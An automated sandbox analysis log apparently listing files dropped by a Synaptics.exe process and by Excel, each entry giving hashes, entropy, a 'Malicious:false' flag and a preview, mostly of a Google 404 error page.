                                                                                                            Malicious:false
                                                                                                            Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="OaEf8EpIhEet5BrhJX-Lqg">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5
                                                                                                            Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                            File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                            Category:dropped
                                                                                                            Size (bytes):1652
                                                                                                            Entropy (8bit):5.259486488960487
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:24:GgsF+0cSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+3+pAZewRDK4mW
                                                                                                            MD5:90F35E186C478EE62C9611BF7D994CEE
                                                                                                            SHA1:27AA3454989219545932A7D835ADB9B0350A2EF6
                                                                                                            SHA-256:0A1E824B533C47F8CDD4901AFFFA1CCD4831137FCE26D1A456C19B200ECDBB6E
                                                                                                            SHA-512:05394DEF87B96EE8B702F724BA9279E59453CA7EAB0CD21DFCFB8D31850CDE6CC81AA4441229B4FFA489C623E6F342E9D096474C39437B4E40BEFF5090F8F0EE
                                                                                                            Malicious:false
                                                                                                            Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="TN5L6NreuGguFL6V-2dKtQ">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5
                                                                                                            Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                            File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                            Category:dropped
                                                                                                            Size (bytes):1652
                                                                                                            Entropy (8bit):5.25242080268606
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:24:GgsF+0swSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+Vw+pAZewRDK4mW
                                                                                                            MD5:F2A09CFFEB72C02A1A507377C7E76BA6
                                                                                                            SHA1:89AB5378408D2D5B678B1EF68612D613A0F483D7
                                                                                                            SHA-256:9FBA1828AC31E32DA4221756EF175516FB93B149360C81DE017FACE6A124E24D
                                                                                                            SHA-512:31AA36C4DFEE50BD6EBD5255C08F5182E53C21277A0D20EC84623756382A91D44676D7A51A5E206639150527EBCC18F9C763B96315620E7DDA31E1F8B92061B8
                                                                                                            Malicious:false
                                                                                                            Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="A1Ud7an00_kL_J5h9_NeUA">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5
                                                                                                            Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                            File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                            Category:dropped
                                                                                                            Size (bytes):1652
                                                                                                            Entropy (8bit):5.255490247568553
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:24:GgsF+0tpSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+kp+pAZewRDK4mW
                                                                                                            MD5:0F01FA7D468FCABE3DF6FC72EBD772F6
                                                                                                            SHA1:18270FD691158A9BE18297C396D88C201CEB7135
                                                                                                            SHA-256:834672EE7ECBD825FBD08E097AAA9ADA4C1ED459226C6D6DD4A681BC33653793
                                                                                                            SHA-512:0F54856BF20608E29017E75B47078A41127DD262E204BBC84752E9779ACE2954A63068D61DCEB73D55E06F9064DA26B3272D28C1C554A680C0E7021ED47A5AEA
                                                                                                            Malicious:false
                                                                                                            Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="q7di327yxjmzdb8mYYhDaA">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5
                                                                                                            Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                            File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                            Category:dropped
                                                                                                            Size (bytes):1652
                                                                                                            Entropy (8bit):5.262296125710373
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:24:GgsF+0BXSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+S+pAZewRDK4mW
                                                                                                            MD5:5CE5263E58944865F3808AEBA0463D03
                                                                                                            SHA1:FE972938A8E2C345C5F07EFC1B442E7440C7B6C7
                                                                                                            SHA-256:D4984956C9C564DBCD8E38877CE625AD233EDEB13CC8F8283D45B5D4FCEC805A
                                                                                                            SHA-512:5B058AC26051CDAD6E61057DF723E6BA2E6B838E6278B4B1DBD60CE2AFE6142033C4F1F69468135C0CB1661A194E95CDF2E208E7114EA9DFCD1B80412F822B18
                                                                                                            Malicious:false
                                                                                                            Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="ifqSMh1YpRExN3PW0mtGvw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5
                                                                                                            Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                            File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                            Category:dropped
                                                                                                            Size (bytes):1652
                                                                                                            Entropy (8bit):5.269114700502722
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:24:GgsF+0ATOSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+w+pAZewRDK4mW
                                                                                                            MD5:34613AACC891E034F621E24CCCB762FB
                                                                                                            SHA1:64C41C2594779F1068F52B9B803AEDE9CB548335
                                                                                                            SHA-256:BD1AEE26E2E7AAC1532DC97A9C460F46B38675875B201C2586D5B271EFCCAC32
                                                                                                            SHA-512:1DD16655B317C80FB54240EB61A01CE34CFA3066F62C2B72094694CF9C2E5C2473ADA6DECCACC42EBF3F0E196E3939AB8734637CA059314C385BD94080C1CC59
                                                                                                            Malicious:false
                                                                                                            Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="8syhXY2NAqJ5Xvkj79niKA">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5
                                                                                                            Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                            File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                            Category:dropped
                                                                                                            Size (bytes):1652
                                                                                                            Entropy (8bit):5.274839992300303
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:24:GgsF+0nSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+0+pAZewRDK4mW
                                                                                                            MD5:4617C38D92940D6D94F5DA932856DA1E
                                                                                                            SHA1:343D59C202248C880694DD5C235646D7BE373804
                                                                                                            SHA-256:FD69E0CE0DE7482083FB24A4D9C642A38CBFBCE199D94386F8022D95A9ED44F0
                                                                                                            SHA-512:31C991FD1CF13ED4F442320C7D65CFFC09E39131A16C57AFE70B2B6D5DF1FF93658D52DA6E331C614499EE4B28746A3CF1918F3BE258CEC1696D03092BDF1BF3
                                                                                                            Malicious:false
                                                                                                            Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="hFPJPTjGdxZvOA7TOGDniQ">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5
                                                                                                            Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                            File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                            Category:dropped
                                                                                                            Size (bytes):1652
                                                                                                            Entropy (8bit):5.26645519198868
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:24:GgsF+0fSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+I+pAZewRDK4mW
                                                                                                            MD5:1AEF587026C8F50B36DCC196856DD62A
                                                                                                            SHA1:07F2346644601228A87C37F749A4DBDC81B34F0E
                                                                                                            SHA-256:2ED781AD394666ABF5D022D7DCB0734F2C4C66F53534EB1679ADCC13418D5BE1
                                                                                                            SHA-512:93F2FF67522333890273EADD232031874768F8FFA83ACA603667CD0BB5A69A897FE20D2E6CE7BE0CE6D9790F7E9750A22FD5043A9B3C70A663EA3B9780CACE47
                                                                                                            Malicious:false
                                                                                                            Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="jnSEGZLtByt8pmokQuKhYA">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5
                                                                                                            Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                            File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                            Category:dropped
                                                                                                            Size (bytes):1652
                                                                                                            Entropy (8bit):5.2778978004245305
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:24:GgsF+0o2IqSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+jdq+pAZewRDK4mW
                                                                                                            MD5:106447152BCA177B6D49CEC95D434DDF
                                                                                                            SHA1:082C1427A906C019100E62BB459F753DF46417BA
                                                                                                            SHA-256:0DAAA87FC624DA84068BED603EFD36A85841FB227C7C763A7951EB965AB53D81
                                                                                                            SHA-512:878A00F5AF0ABAA490EEA6CBB88791D1F3AAA5487188A76263F413A1C31DD104C5150BC495DDF6033A7B26B959ED514654A5D1A56684E70646BB6B3F39298964
                                                                                                            Malicious:false
                                                                                                            Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="UzkDCvXAR9O2SmXqGN9Hbg">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5
                                                                                                            Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                            File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                            Category:dropped
                                                                                                            Size (bytes):1652
                                                                                                            Entropy (8bit):5.26742581276337
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:24:GgsF+0czSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+X+pAZewRDK4mW
                                                                                                            MD5:39970EC504BE760F9F0D6AC67F716CEE
                                                                                                            SHA1:E8794369FCF102025F3F9C1B6513B728D26D8137
                                                                                                            SHA-256:EF6093F0C9379D97813904DF77532922BE56B9F3DEFEDB244613528C1FB15BB2
                                                                                                            SHA-512:BF61A3CA9B9DB18A497E00618EC24D4F76F58A7E5DACC5636175597A209520D100C0ED66C6FE2B34F17F348A2906CF56F51A0EBB0E958863F0D7A0D9795E369A
                                                                                                            Malicious:false
                                                                                                            Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="-W2Ny8l5XZzENb1JwKf2FQ">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5
                                                                                                            Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                            File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                            Category:dropped
                                                                                                            Size (bytes):1652
                                                                                                            Entropy (8bit):5.25364991948416
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:24:GgsF+0H3SU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+83+pAZewRDK4mW
                                                                                                            MD5:0FB4BE6C7579CD82CC73FAFD3F863AE0
                                                                                                            SHA1:3BCB5114C895311DEC622923D299BF9DE932FE75
                                                                                                            SHA-256:25B5176885A7687ADBC55DA06DD7C1E8B1039916FA3B4115D8AA161FBC760B8F
                                                                                                            SHA-512:39A8264D759258815ACB89A5D92EBA8FADE1D6FF8945B20CB3E51099A98A694C72800FA6DF45F79E185287A581069FDC734909F5CBBA30A1E115AAA26492A406
                                                                                                            Malicious:false
                                                                                                            Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="Gm-AFXL5XrOuavoGgvp8vw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5
                                                                                                            Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                            File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                            Category:dropped
                                                                                                            Size (bytes):1652
                                                                                                            Entropy (8bit):5.272593185220059
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:24:GgsF+03DSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+o+pAZewRDK4mW
                                                                                                            MD5:6637742684B39AB3C66B2263BF9F9B85
                                                                                                            SHA1:74629EE9382764474509DE068A37C2C25ED7F861
                                                                                                            SHA-256:09D4A1C51F17476B034E0CF85F8C22B970A4B2BDFC700D5EAC7F093994B5800F
                                                                                                            SHA-512:36162B07DE6CD9F56C532029F2B45AA696E579C8264A0A9E63B4ADCCC301D0D17BE41309C2FEEAAAB136CD7D6FD30FF1C65D6AE12154411BAABCF3E0F7CF73BD
                                                                                                            Malicious:false
                                                                                                            Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="TbdNS-TNWtQESCR7D26eLA">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5
                                                                                                            Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                            File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                            Category:dropped
                                                                                                            Size (bytes):1652
                                                                                                            Entropy (8bit):5.271204789546022
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:24:GgsF+0OwSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+e+pAZewRDK4mW
                                                                                                            MD5:2B1BF96352F6815F4F1BE0AC58DC1125
                                                                                                            SHA1:72607DA013E6D952520783D0FE8D412D7F9B435E
                                                                                                            SHA-256:6A2E511113E9300B9DCB47C5511F62D150B1CA1BC67C70E9C0138DDCCB99F98E
                                                                                                            SHA-512:0A527C7B1EDD4290AC8499B649DD593EC613B5800217DB633F3FD3AD8BF240C0E6D62D0EC24FBF8C2CB99C65D54AC89B6FE22BC0F2DB4A3B2C79A01AA87FBAAF
                                                                                                            Malicious:false
                                                                                                            Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="4VTs5yjLAKJlTT14EuFjEQ">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5
                                                                                                            Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                            File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                            Category:dropped
                                                                                                            Size (bytes):1652
                                                                                                            Entropy (8bit):5.254329870034298
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:24:GgsF+0yzSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+Vz+pAZewRDK4mW
                                                                                                            MD5:1E9D1379ABA6F4BB0391F0B24620668D
                                                                                                            SHA1:98B2CA13C03427541CD8997CC6A2F1584D26F9E9
                                                                                                            SHA-256:68195382BED4A8314CB8CDE759BB3C3563580CC111DBFA08926BA0D8B4C19328
                                                                                                            SHA-512:1659D105618E0588C5F72D32EA0F25E9407FCA130D1C7A3D892C226388A648ABB64A056EF3E1BA0E182B801CC38663A01B51AD8FB79CCCE3C46A4BFD10EEA1E5
                                                                                                            Malicious:false
                                                                                                            Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="t-hK7V_meVUc1V-_ZEDTlg">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5
                                                                                                            Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                            File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                            Category:dropped
                                                                                                            Size (bytes):1652
                                                                                                            Entropy (8bit):5.257147163971306
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:24:GgsF+0M4SU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+B4+pAZewRDK4mW
                                                                                                            MD5:89605F9337050632E889656F730A4C1C
                                                                                                            SHA1:21510A6C1A5E3DFD6396511503F1000CE774CC39
                                                                                                            SHA-256:535BBBA9B4CFDB153DB446B120F59836FE98943E22D9B15DF23F04C68072268E
                                                                                                            SHA-512:62CB9A71FB74E77BEC01E20C664C7F59D854054CE676950E109E8C8FF350E3CD9976E0D1AD5290BFB787243816C5ED86BB8D4AEBA9FD3A28AE8339F35DE5D40A
                                                                                                            Malicious:false
                                                                                                            Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="45g2rDMNDomd-CxBffTjhA">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5
                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                                                                                            File Type:data
                                                                                                            Category:dropped
                                                                                                            Size (bytes):165
                                                                                                            Entropy (8bit):1.3520167401771568
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:3:8Nultln:X1n
                                                                                                            MD5:9AC4D67F6E514F452D4A1DB79CE3B2E8
                                                                                                            SHA1:33F8C665ECBB81275D2E49D48F2565A58A282043
                                                                                                            SHA-256:407E1D871964C93DBDBD4D00613CD0A9E30D3ED6352D8052C58E7A252D52FC5A
                                                                                                            SHA-512:018D0F54AB0AB01F27E9FB870A128F2F581A58487399DD7FB56A94EC4AAEC6874708A5AD5650F362485E45E2C6A557ED08524C5B8335F83F240E0962281A0F1A
                                                                                                            Malicious:false
                                                                                                            Preview:.user ..c.a.l.i. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                                                                                            File Type:data
                                                                                                            Category:dropped
                                                                                                            Size (bytes):165
                                                                                                            Entropy (8bit):1.3520167401771568
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:3:8Nultln:X1n
                                                                                                            MD5:9AC4D67F6E514F452D4A1DB79CE3B2E8
                                                                                                            SHA1:33F8C665ECBB81275D2E49D48F2565A58A282043
                                                                                                            SHA-256:407E1D871964C93DBDBD4D00613CD0A9E30D3ED6352D8052C58E7A252D52FC5A
                                                                                                            SHA-512:018D0F54AB0AB01F27E9FB870A128F2F581A58487399DD7FB56A94EC4AAEC6874708A5AD5650F362485E45E2C6A557ED08524C5B8335F83F240E0962281A0F1A
                                                                                                            Malicious:false
                                                                                                            Preview:.user ..c.a.l.i. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                                                                                            File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                            Category:dropped
                                                                                                            Size (bytes):32768
                                                                                                            Entropy (8bit):3.746897789531007
